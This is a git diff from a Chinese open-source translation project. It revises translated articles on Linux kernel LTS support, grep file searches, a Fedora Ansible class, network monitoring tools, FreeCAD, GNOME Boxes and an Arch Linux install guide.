正如 [Linux 基金会][8]的 IT 技术设施安全主管 Konstantin Ryabitsev 在 Google+ 上发文解释说,“尽管外面的各种各样的新闻网站可能已经告知你们,但是[内核版本 4.14 的 LTS 并不计划支持 6 年][9]。只是因为 Greg Kroah-Hartman 正在为 LTS 4.4 版本做这项工作并不表示从现在开始所有的 LTS 内核会维持那么久。”
|
||||
|
||||
所以,简而言之,Linux 4.14 将支持到 2020 年 1月份,而 2016 年 1 月 20 号问世的 Linux 4.4 内核将支持到 2022 年。因此,如果你正在编写一个打算能够长期运行的 Linux 发行版,那你需要基于 [Linux 4.4 版本][10]。
|
||||
|
||||
[Linux LTS 版本][11]包含对旧内核树的后向移植漏洞的修复。不是所有漏洞的修复都被导入进来,只有重要漏洞的修复才用于这些内核中。它们不会非常频繁的发布,特别是对那些旧版本的内核树来说。
|
||||
|
||||
Linux 其它的版本有<ruby>尝鲜版<rt>Prepatch</rt></ruby>或发布候选版(RC)、<ruby>主线版<rt>Mainline</rt></ruby>,<ruby>稳定版<rt>Stable</rt></ruby>和 LTS 版。
|
||||
|
||||
RC 版必须从源代码编译并且通常包含漏洞的修复和新特性。这些都是由 Linux Torvalds 维护和发布的。他也维护主线版本树(这是所有新特性被引入的地方)。新的主线内核每几个月发布一次。当主线版本树发布以便通用时,它被称为“稳定版”。稳定版的内核漏洞修复是从主线版本树后向移植的,并且这些修复是由一个指定的稳定版内核维护者来申请。在下一个主线内核变得可用之前,通常也有一些修复漏洞的内核发布。
|
||||
|
||||
对于最新的 LTS 版本,Linux 4.14,Ryabitsev 说,“Greg 已经担负起了 4.14 版本的维护者责任(过去发生过多次),其他人想成为该版本的维护者也是有可能的,但是你最后不要指望。"
|
||||
|
||||
Kroah-Hartman 对 Ryabitsev 的帖子回复道:“[他说神马。][12]”
|
||||
|
||||
-------------------
|
||||
via: http://www.zdnet.com/article/long-term-linux-support-future-clarified/
|
||||
|
||||
作者:[Steven J. Vaughan-Nichols][a]
|
||||
译者:[liuxinyu123](https://github.com/liuxinyu123)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[1]:http://www.zdnet.com/article/long-term-linux-support-future-clarified/#comments-eb4f0633-955f-4fec-9e56-734c34ee2bf2
|
||||
[2]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[3]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[4]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[5]:http://www.zdnet.com/article/long-term-support-linux-gets-a-longer-lease-on-life/
|
||||
[6]:http://www.zdnet.com/article/the-new-long-term-linux-kernel-linux-4-14-has-arrived/
|
||||
[7]:https://www.android.com/
|
||||
[8]:https://www.linuxfoundation.org/
|
||||
[9]:https://plus.google.com/u/0/+KonstantinRyabitsev/posts/Lq97ZtL8Xw9
|
||||
[10]:http://www.zdnet.com/article/whats-new-and-nifty-in-linux-4-4/
|
||||
[11]:https://www.kernel.org/releases.html
|
||||
[12]:https://plus.google.com/u/0/+gregkroahhartman/posts/ZUcSz3Sn1Hc
|
||||
[13]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[14]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[15]:http://www.zdnet.com/blog/open-source/
|
||||
[16]:http://www.zdnet.com/topic/enterprise-software/
|
||||
|
||||
|
||||
|
||||
|
@ -1,18 +1,14 @@
|
||||
如何在 Linux shell 中找出所有包含指定文本的文件
|
||||
------
|
||||
### 目标
|
||||
===========
|
||||
|
||||
本文提供一些关于如何搜索出指定目录或整个文件系统中那些包含指定单词或字符串的文件。
|
||||
**目标:**本文提供一些关于如何搜索出指定目录或整个文件系统中那些包含指定单词或字符串的文件。
|
||||
|
||||
### 难度
|
||||
**难度:**容易
|
||||
|
||||
容易
|
||||
**约定:**
|
||||
|
||||
### 约定
|
||||
|
||||
* \# - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 sudo 命令
|
||||
|
||||
* \$ - 可以使用普通用户来执行指定命令
|
||||
* `#` - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 `sudo` 命令
|
||||
* `$` - 可以使用普通用户来执行指定命令
|
||||
|
||||
### 案例
|
||||
|
||||
@ -25,12 +21,14 @@
|
||||
/etc/os-release:PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
|
||||
/etc/os-release:VERSION="9 (stretch)"
|
||||
```
|
||||
grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制报错信息。结果现实除了文件名外还有包含请求字符串的行也被一起输出了。
|
||||
|
||||
`grep` 的 `-s` 选项会在发现不存在或者不能读取的文件时隐藏报错信息。结果显示除了文件名之外,还有包含请求字符串的行也被一起输出了。
|
||||
|
||||
#### 递归地搜索包含指定字符串的文件
|
||||
|
||||
上面案例中忽略了所有的子目录。所谓递归搜索就是指同时搜索所有的子目录。
|
||||
下面的命令会在 `/etc/` 及其子目录中搜索包含 `stretch` 字符串的文件:
|
||||
|
||||
下面的命令会在 `/etc/` 及其子目录中搜索包含 `stretch` 字符串的文件:
|
||||
|
||||
```shell
|
||||
# grep -R stretch /etc/*
|
||||
@ -67,7 +65,8 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制
|
||||
```
|
||||
|
||||
#### 搜索所有包含特定单词的文件
|
||||
上面 `grep` 命令的案例中列出的是所有包含字符串 `stretch` 的文件。也就是说包含 `stretches` , `stretched` 等内容的行也会被显示。 使用 grep 的 `-w` 选项会只显示包含特定单词的行:
|
||||
|
||||
上面 `grep` 命令的案例中列出的是所有包含字符串 `stretch` 的文件。也就是说包含 `stretches` , `stretched` 等内容的行也会被显示。 使用 `grep` 的 `-w` 选项会只显示包含特定单词的行:
|
||||
|
||||
```shell
|
||||
# grep -Rw stretch /etc/*
|
||||
@ -84,8 +83,9 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制
|
||||
/etc/os-release:VERSION="9 (stretch)"
|
||||
```
|
||||
|
||||
#### 显示包含特定文本文件的文件名
|
||||
上面的命令都会产生多余的输出。下一个案例则会递归地搜索 `etc` 目录中包含 `stretch` 的文件并只输出文件名:
|
||||
#### 显示包含特定文本的文件名
|
||||
|
||||
上面的命令都会产生多余的输出。下一个案例则会递归地搜索 `etc` 目录中包含 `stretch` 的文件并只输出文件名:
|
||||
|
||||
```shell
|
||||
# grep -Rl stretch /etc/*
|
||||
@ -96,8 +96,10 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制
|
||||
```
|
||||
|
||||
#### 大小写不敏感的搜索
|
||||
默认情况下搜索 hi 大小写敏感的,也就是说当搜索字符串 `stretch` 时只会包含大小写一致内容的文件。
|
||||
通过使用 grep 的 `-i` 选项,grep 命令还会列出所有包含 `Stretch` , `STRETCH` , `StReTcH` 等内容的文件,也就是说进行的是大小写不敏感的搜索。
|
||||
|
||||
默认情况下搜索是大小写敏感的,也就是说当搜索字符串 `stretch` 时只会包含大小写一致内容的文件。
|
||||
|
||||
通过使用 `grep` 的 `-i` 选项,`grep` 命令还会列出所有包含 `Stretch` , `STRETCH` , `StReTcH` 等内容的文件,也就是说进行的是大小写不敏感的搜索。
|
||||
|
||||
```shell
|
||||
# grep -Ril stretch /etc/*
|
||||
@ -108,8 +110,9 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制
|
||||
/etc/os-release
|
||||
```
|
||||
|
||||
#### 搜索是包含/排除指定文件
|
||||
`grep` 命令也可以只在指定文件中进行搜索。比如,我们可以只在配置文件(扩展名为`.conf`)中搜索指定的文本/字符串。 下面这个例子就会在 `/etc` 目录中搜索带字符串 `bash` 且所有扩展名为 `.conf` 的文件:
|
||||
#### 搜索时包含/排除指定文件
|
||||
|
||||
`grep` 命令也可以只在指定文件中进行搜索。比如,我们可以只在配置文件(扩展名为`.conf`)中搜索指定的文本/字符串。 下面这个例子就会在 `/etc` 目录中搜索带字符串 `bash` 且所有扩展名为 `.conf` 的文件:
|
||||
|
||||
```shell
|
||||
# grep -Ril bash /etc/*.conf
|
||||
@ -118,7 +121,7 @@ OR
|
||||
/etc/adduser.conf
|
||||
```
|
||||
|
||||
类似的,也可以使用 `--exclude` 来排除特定的文件:
|
||||
类似的,也可以使用 `--exclude` 来排除特定的文件:
|
||||
|
||||
```shell
|
||||
# grep -Ril --exclude=\*.conf bash /etc/*
|
||||
@ -146,8 +149,10 @@ OR
|
||||
```
|
||||
|
||||
#### 搜索时排除指定目录
|
||||
跟文件一样,grep 也能在搜索时排除指定目录。 使用 `--exclude-dir` 选项就行。
|
||||
下面这个例子会搜索 `/etc` 目录中搜有包含字符串 `stretch` 的文件,但不包括 `/etc/grub.d` 目录下的文件:
|
||||
|
||||
跟文件一样,`grep` 也能在搜索时排除指定目录。 使用 `--exclude-dir` 选项就行。
|
||||
|
||||
下面这个例子会搜索 `/etc` 目录中搜有包含字符串 `stretch` 的文件,但不包括 `/etc/grub.d` 目录下的文件:
|
||||
|
||||
```shell
|
||||
# grep --exclude-dir=/etc/grub.d -Rwl stretch /etc/*
|
||||
@ -157,6 +162,7 @@ OR
|
||||
```
|
||||
|
||||
#### 显示包含搜索字符串的行号
|
||||
|
||||
`-n` 选项还会显示指定字符串所在行的行号:
|
||||
|
||||
```shell
|
||||
@ -165,8 +171,10 @@ OR
|
||||
```
|
||||
|
||||
#### 寻找不包含指定字符串的文件
|
||||
最后这个例子使用 `-v` 来列出所有 *不* 包含指定字符串的文件。
|
||||
例如下面命令会搜索 `/etc` 目录中不包含 `stretch` 的所有文件:
|
||||
|
||||
最后这个例子使用 `-v` 来列出所有**不**包含指定字符串的文件。
|
||||
|
||||
例如下面命令会搜索 `/etc` 目录中不包含 `stretch` 的所有文件:
|
||||
|
||||
```shell
|
||||
# grep -Rlv stretch /etc/*
|
||||
@ -178,7 +186,7 @@ via: https://linuxconfig.org/how-to-find-all-files-with-a-specific-text-using-li
|
||||
|
||||
作者:[Lubos Rendek][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者 ID](https://github.com/校对者 ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -1,6 +1,5 @@
|
||||
### [Fedora 课堂会议: Ansible 101][2]
|
||||
|
||||
### By Sachin S Kamath
|
||||
Fedora 课堂会议:Ansible 101
|
||||
==========
|
||||
|
||||
![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg)
|
||||
|
||||
@ -13,19 +12,12 @@ Fedora 课堂会议本周继续进行,本周的主题是 Ansible。 会议的
|
||||
本课堂课程涵盖以下主题:
|
||||
|
||||
1. SSH 简介
|
||||
|
||||
2. 了解不同的术语
|
||||
|
||||
3. Ansible 简介
|
||||
|
||||
4. Ansible 安装和设置
|
||||
|
||||
5. 建立无密码连接
|
||||
|
||||
6. Ad-hoc 命令
|
||||
|
||||
7. 管理 inventory
|
||||
|
||||
8. Playbooks 示例
|
||||
|
||||
之后还将有 Ansible 102 的后续会议。该会议将涵盖复杂的 playbooks,playbooks 角色(roles),动态 inventory 文件,流程控制和 Ansible Galaxy 命令行工具.
|
||||
@ -43,7 +35,6 @@ Fedora 课堂会议本周继续进行,本周的主题是 Ansible。 会议的
|
||||
本次会议将在 [BlueJeans][10] 上进行。下面的信息可以帮你加入到会议:
|
||||
|
||||
* 网址: [https://bluejeans.com/3466040121][1]
|
||||
|
||||
* 会议 ID (桌面版): 3466040121
|
||||
|
||||
我们希望您可以参加,学习,并享受这个会议!如果您对会议有任何反馈意见,有什么新的想法或者想要主持一个会议, 可以随时在这篇文章发表评论或者查看[课堂 wiki 页面][11].
|
||||
@ -54,7 +45,7 @@ via: https://fedoramagazine.org/fedora-classroom-session-ansible-101/
|
||||
|
||||
作者:[Sachin S Kamath]
|
||||
译者:[imquanquan](https://github.com/imquanquan)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
129
published/20171203 Best Network Monitoring Tools For Linux.md
Normal file
129
published/20171203 Best Network Monitoring Tools For Linux.md
Normal file
@ -0,0 +1,129 @@
|
||||
十个不错的 Linux 网络监视工具
|
||||
===============================
|
||||
|
||||
![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/best-network-monitoring-tools_orig.jpg)
|
||||
|
||||
保持对我们的网络的管理,防止任何程序过度使用网络、导致整个系统操作变慢,对管理员来说是至关重要的。有几个网络监视工具可以用于不同的操作系统。在这篇文章中,我们将讨论从 Linux 终端中运行的 10 个网络监视工具。它对不使用 GUI 而希望通过 SSH 来保持对网络管理的用户来说是非常理想的。
|
||||
|
||||
### iftop
|
||||
|
||||
[![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2]
|
||||
|
||||
Linux 用户通常都熟悉 `top` —— 这是一个系统监视工具,它允许我们知道在我们的系统中实时运行的进程,并可以很容易地管理它们。`iftop` 与 `top` 应用程序类似,但它是专门监视网络的,通过它可以知道更多的关于网络的详细情况和使用网络的所有进程。
|
||||
|
||||
我们可以从 [这个链接][3] 获取关于这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### vnstat
|
||||
|
||||
[![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4]
|
||||
|
||||
`vnstat` 是一个缺省包含在大多数 Linux 发行版中的网络监视工具。它允许我们对一个用户选择的时间周期内发送和接收的流量进行实时控制。
|
||||
|
||||
我们可以从 [这个链接][5] 获取关于这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### iptraf
|
||||
|
||||
[![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6]
|
||||
|
||||
IPTraf 是一个基于控制台的 Linux 实时网络监视程序。它会收集经过这个网络的各种各样的信息作为一个 IP 流量监视器,包括 TCP 标志信息、ICMP 详细情况、TCP / UDP 流量故障、TCP 连接包和字节计数。它也收集接口上全部的 TCP、UDP、…… IP 协议和非 IP 协议 ICMP 的校验和错误、接口活动等等的详细情况。(LCTT 译注:此处原文有误,径改之)
|
||||
|
||||
我们可以从 [这个链接][7] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Monitorix - 系统和网络监视
|
||||
|
||||
[![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8]
|
||||
|
||||
Monitorix 是一个轻量级的免费应用程序,它设计用于去监视尽可能多的 Linux / Unix 服务器的系统和网络资源。它里面添加了一个 HTTP web 服务器,可以定期去收集系统和网络信息,并且在一个图表中显示它们。它跟踪平均系统负载、内存分配、磁盘健康状态、系统服务、网络端口、邮件统计信息(Sendmail、Postfix、Dovecot 等等)、MySQL 统计信息以及其它的更多内容。它设计用于去管理系统的整体性能,以及帮助检测故障、瓶颈、异常活动等等。
|
||||
|
||||
下载及更多 [信息在这里][9]。
|
||||
|
||||
### dstat
|
||||
|
||||
[![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10]
|
||||
|
||||
这个监视器相比前面的几个知名度低一些,但是,在一些发行版中已经缺省包含了。
|
||||
|
||||
我们可以从 [这个链接][11] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### bwm-ng
|
||||
|
||||
[![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12]
|
||||
|
||||
这是最简化的工具之一。它允许你去从连接中交互式取得数据,并且,为了便于其它设备使用,在取得数据的同时,能以某些格式导出它们。
|
||||
|
||||
我们可以从 [这个链接][13] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### ibmonitor
|
||||
|
||||
[![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14]
|
||||
|
||||
与上面的类似,它显示连接接口上过滤后的网络流量,并且,明确地将接收流量和发送流量区分开。
|
||||
|
||||
我们可以从 [这个链接][15] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Htop - Linux 进程跟踪
|
||||
|
||||
[![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16]
|
||||
|
||||
Htop 是一个更先进的、交互式的、实时的 Linux 进程跟踪工具。它类似于 Linux 的 top 命令,但是有一些更高级的特性,比如,一个更易于使用的进程管理界面、快捷键、水平和垂直的进程视图等更多特性。Htop 是一个第三方工具,它不包含在 Linux 系统中,你必须使用 **YUM** 或者 **APT-GET** 或者其它的包管理工具去安装它。关于安装它的更多信息,读[这篇文章][17]。
|
||||
|
||||
我们可以从 [这个链接][18] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### arpwatch - 以太网活动监视器
|
||||
|
||||
[![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19]
|
||||
|
||||
arpwatch 是一个设计用于在 Linux 网络中去管理以太网通讯的地址解析程序。它持续监视以太网通讯并记录一个网络中的 IP 地址和 MAC 地址的变化,该变化同时也会记录一个时间戳。它也有一个功能是当一对 IP 和 MAC 地址被添加或者发生变化时,发送一封邮件给系统管理员。在一个网络中发生 ARP 攻击时,这个功能非常有用。
|
||||
|
||||
我们可以从 [这个链接][20] 获取这个工具的更多信息以及下载必要的包。
|
||||
|
||||
### Wireshark - 网络监视工具
|
||||
|
||||
[![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21]
|
||||
|
||||
[Wireshark][1] 是一个自由的应用程序,它允许你去捕获和查看前往你的系统和从你的系统中返回的信息,它可以去深入到数据包中并查看每个包的内容 —— 以分别满足你的不同需求。它一般用于去研究协议问题和去创建和测试程序的特别情况。这个开源分析器是一个被公认的分析器商业标准,它的流行要归功于其久负盛名。
|
||||
|
||||
最初它被叫做 Ethereal,Wireshark 有轻量化的、易于理解的界面,它能分类显示来自不同的真实系统上的协议信息。
|
||||
|
||||
### 结论
|
||||
|
||||
在这篇文章中,我们看了几个开源的网络监视工具。虽然我们从这些工具中挑选出来的认为是“最佳的”,并不意味着它们都是最适合你的需要的。例如,现在有很多的开源监视工具,比如,OpenNMS、Cacti、和 Zennos,并且,你需要去从你的个体情况考虑它们的每个工具的优势。
|
||||
|
||||
另外,还有不同的、更适合你的需要的不开源的工具。
|
||||
|
||||
你知道的或者使用的在 Linux 终端中的更多网络监视工具还有哪些?
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux
|
||||
|
||||
作者:[LinuxAndUbuntu][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.linuxandubuntu.com
|
||||
[1]:https://www.wireshark.org/
|
||||
[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png
|
||||
[3]:http://www.ex-parrot.com/pdw/iftop/
|
||||
[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png
|
||||
[5]:http://humdi.net/vnstat/
|
||||
[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif
|
||||
[7]:http://iptraf.seul.org/
|
||||
[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png
|
||||
[9]:http://www.monitorix.org
|
||||
[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png
|
||||
[11]:http://dag.wiee.rs/home-made/dstat/
|
||||
[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png
|
||||
[13]:http://sourceforge.net/projects/bwmng/
|
||||
[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg
|
||||
[15]:http://ibmonitor.sourceforge.net/
|
||||
[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png
|
||||
[17]:http://wesharethis.com/knowledgebase/htop-and-atop/
|
||||
[18]:http://hisham.hm/htop/
|
||||
[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png
|
||||
[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml
|
||||
[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg
|
||||
|
||||
|
@ -1,45 +1,34 @@
|
||||
FreeCAD - Linux 下的 3D 建模和设计软件
|
||||
FreeCAD:Linux 下的 3D 建模和设计软件
|
||||
============================================================
|
||||
|
||||
![FreeCAD 3D Modeling Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Modeling-Software.png)
|
||||
|
||||
[FreeCAD][8]是一个基于 OpenCasCade 的跨平台机械工程和产品设计工具。作为参数化 3D 建模工具,它可以与 PLM、CAx、CAE、MCAD 和 CAD 协同工作,并且可以使用大量高级扩展和自定义选项扩展其功能。
|
||||
[FreeCAD][8] 是一个基于 OpenCasCade 的跨平台机械工程和产品设计工具。作为参数化 3D 建模工具,它可以与 PLM、CAx、CAE、MCAD 和 CAD 协同工作,并且可以使用大量高级扩展和自定义选项扩展其功能。
|
||||
|
||||
它有基于 QT 的简约用户界面,具有可切换的面板、布局、工具栏、大量的 Python API 以及符合 Open Inventor 的 3D 场景表示模型(感谢 Coin 3D 库)。
|
||||
它有基于 Qt 的简约用户界面,具有可切换的面板、布局、工具栏、大量的 Python API 以及符合 Open Inventor 的 3D 场景表示模型(感谢 Coin 3D 库)。
|
||||
|
||||
[![FreeCAD 3D Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Software.png)][9]
|
||||
|
||||
FreeCAD 3D 软件
|
||||
*FreeCAD 3D 软件*
|
||||
|
||||
正如在网站上所列出的,FreeCAD 有一些使用案例,即:
|
||||
|
||||
> * 家庭用户/业余爱好者:有一个想要构建,或已经已经构建,或者 3D 打印的项目么?在 FreeCAD 中建模。无需之前的 CAD 经验。我们的社区将帮助你快速掌握它!
|
||||
>
|
||||
> * 家庭用户/业余爱好者:有一个想要构建,或已经已经构建,或者 3D 打印的项目么?在 FreeCAD 中建模。无需之前具有 CAD 经验。我们的社区将帮助你快速掌握它!
|
||||
> * 有经验的 CAD 用户:如果你在工作中使用商业 CAD 或 BIM 建模软件,你会在 FreeCAD 的许多工作台中找到类似的工具和工作流程。
|
||||
>
|
||||
> * 程序员:几乎所有的 FreeCAD 功能都可以用 Python 访问。你可以轻松扩展 FreeCAD 的功能,使用脚本将其自动化,创建自己的模块,甚至将 FreeCAD 嵌入到自己的程序中。
|
||||
>
|
||||
> * 教育者:教给你的学生一个免费的软件,不用担心购买许可证。他们可以在家里安装相同的版本,并在离开学校后继续使用它。
|
||||
|
||||
#### FreeCAD 中的功能
|
||||
### FreeCAD 中的功能
|
||||
|
||||
* 免费软件:FreeCAD 免费供所有人下载和使用。
|
||||
|
||||
* 开源:在 [GitHub][4] 上开源。
|
||||
|
||||
* 跨平台:所有的 Windows、Linux 和 Mac 用户都可以享受 FreeCAD 的功能。
|
||||
|
||||
* 全面的[在线文档][5]。
|
||||
|
||||
* 一个给初学者和专业人士的免费[在线手册][6]。
|
||||
|
||||
* 注释支持。例如:文字和尺寸。
|
||||
|
||||
* 内置的 Python 控制台。
|
||||
|
||||
* 完全可定制和脚本化的用户界面。
|
||||
|
||||
* [这里][7]有展示项目的在线社区。
|
||||
|
||||
* 用于建模和设计各种物体的可扩展模块。
|
||||
|
||||
FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请随时在其网站的[功能页面][11]上查看其余的功能。
|
||||
@ -48,7 +37,7 @@ FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请
|
||||
|
||||
尝试一下它,看看你是否不喜欢它。
|
||||
|
||||
[下载 Linux 下的 FreeCAD][13]
|
||||
- [下载 Linux 下的 FreeCAD][13]
|
||||
|
||||
准备成为 FreeCAD 用户了么?你最喜欢哪个功能?你有没有遇到过与它功能相近的其他软件?
|
||||
|
||||
@ -58,9 +47,9 @@ FreeCAD 为用户提供的功能比我们在这里列出的多得多,所以请
|
||||
|
||||
via: https://www.fossmint.com/freecad-3d-modeling-and-design-software-for-linux/
|
||||
|
||||
作者:[Martins D. Okoi ][a]
|
||||
作者:[Martins D. Okoi][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -1,26 +1,25 @@
|
||||
# GNOME Boxes 使得测试 Linux 发行版更加简单
|
||||
GNOME Boxes 使得测试 Linux 发行版更加简单
|
||||
==============
|
||||
|
||||
![GNOME Boxes Distribution Selection](http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/GNOME-Boxes-INstall-Distros-750x475.jpg)
|
||||
|
||||
在 GNOME 桌面上创建 Linux 虚拟机即将变得更加简单。
|
||||
> 在 GNOME 桌面上创建 Linux 虚拟机即将变得更加简单。
|
||||
|
||||
[_GNOME Boxes_][5] 的下一个主要版本能够直接在应用程序内下载流行的 Linux(和基于 BSD 的)操作系统。
|
||||
[GNOME Boxes][5] 的下一个主要版本能够直接在应用程序内下载流行的 Linux(和基于 BSD 的)操作系统。
|
||||
|
||||
Boxes 是免费的开源软件。它可以用来访问远程和虚拟系统,因为它是用 [QEMU][6]、KVM 和 libvirt 虚拟化技术构建的。
|
||||
Boxes 是自由开源软件。它可以用来访问远程和虚拟系统,因为它是用 [QEMU][6]、KVM 和 libvirt 虚拟化技术构建的。
|
||||
|
||||
对于新的 ISO-toting 的集成,_Boxes_ 利用 [libosinfo][7] 这一操作系统的数据库,该数据库还提供了有关任何虚拟化环境要求的详细信息。
|
||||
|
||||
在 GNOME 开发者 Felipe Borges 的[这个(起错标题)视频] [8]中,你可以看到改进的“源选择”页面,包括为给定的发行版下载特定 ISO 架构的能力:
|
||||
在 GNOME 开发者 Felipe Borges 的[这个(起错标题的)视频] [8]中,你可以看到改进的“源选择”页面,包括为给定的发行版下载特定架构的 ISO 的能力:
|
||||
|
||||
[video](https://youtu.be/CGahI05Gbac)
|
||||
|
||||
尽管它是一个核心 GNOME 程序,我不得不承认,我从来没有使用过 Boxes。(我这么做)并不是说我没有听到有关它的好处,只是我更熟悉在 VirtualBox 中设置和配置虚拟机。
|
||||
|
||||
> “我内心的偷懒精神会欣赏这个集成”
|
||||
|
||||
我承认在浏览器中下载一个 ISO 然后将虚拟机指向它(见鬼,这是我们大多数在过去十年来一直做的事)并不是一件很_困难_的事。
|
||||
|
||||
但是我内心的偷懒精神会欣赏这个集成。
|
||||
但是我内心的偷懒精神会欣赏这种集成。
|
||||
|
||||
所以,感谢这个功能,我将在明年 3 月份发布 GNOME 3.28 时,在我的系统上解压 Boxes。我会启动 _Boxes_,闭上眼睛,随意从列表中挑选一个发行版,并立即拓宽我的视野。
|
||||
|
||||
@ -28,9 +27,9 @@ Boxes 是免费的开源软件。它可以用来访问远程和虚拟系统,
|
||||
|
||||
via: http://www.omgubuntu.co.uk/2017/12/gnome-boxes-install-linux-distros-directly
|
||||
|
||||
作者:[ JOEY SNEDDON ][a]
|
||||
作者:[JOEY SNEDDON][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,300 @@
|
||||
一步步教你如何安装 Arch Linux
|
||||
======
|
||||
|
||||
![How to install Arch Linux][5]
|
||||
|
||||
> 简要说明:这一教程会教你如何用简单步骤安装 Arch Linux。
|
||||
|
||||
[Arch Linux][1] 是一个 x86-64 通用发行版,它流行于那些喜欢 [DIY][2] Linux 系统的用户和 Linux 铁杆粉丝当中。其默认的安装文件只含有一个最基本的系统,它希望使用者自己配置并使用 Arch 系统。其基于 KISS 原则(<ruby>使它保持简单、傻瓜<rt>Keep It Simple, Stupid!</rt></ruby>),Arch Linux 是一个专注于优雅、代码正确,精简而简洁的系统。
|
||||
|
||||
Arch 支持滚动发布模式,并且有自己的软件包管理器 —— [pacman][3]。为了提供一个先锐的操作系统,Arch 绝不会错失任何一个最新的源。实际上,它只提供了一个最小化的基本操作系统,使得你可以在低端硬件上安装 Arch,并且只安装你所必须的软件包。
|
||||
|
||||
同时,它也是最流行的从头开始学习 Linux 的操作系统之一。如果你想以 DIY 精神自己体验一番,你应该尝试一下 Arch Linux。 这被许多 Linux 用户视作核心的 Linux 体验。
|
||||
|
||||
在这篇文章里,我们会了解到如何安装、配置 Arch 并在其上安装桌面环境。
|
||||
|
||||
### 如何安装 Arch Linux
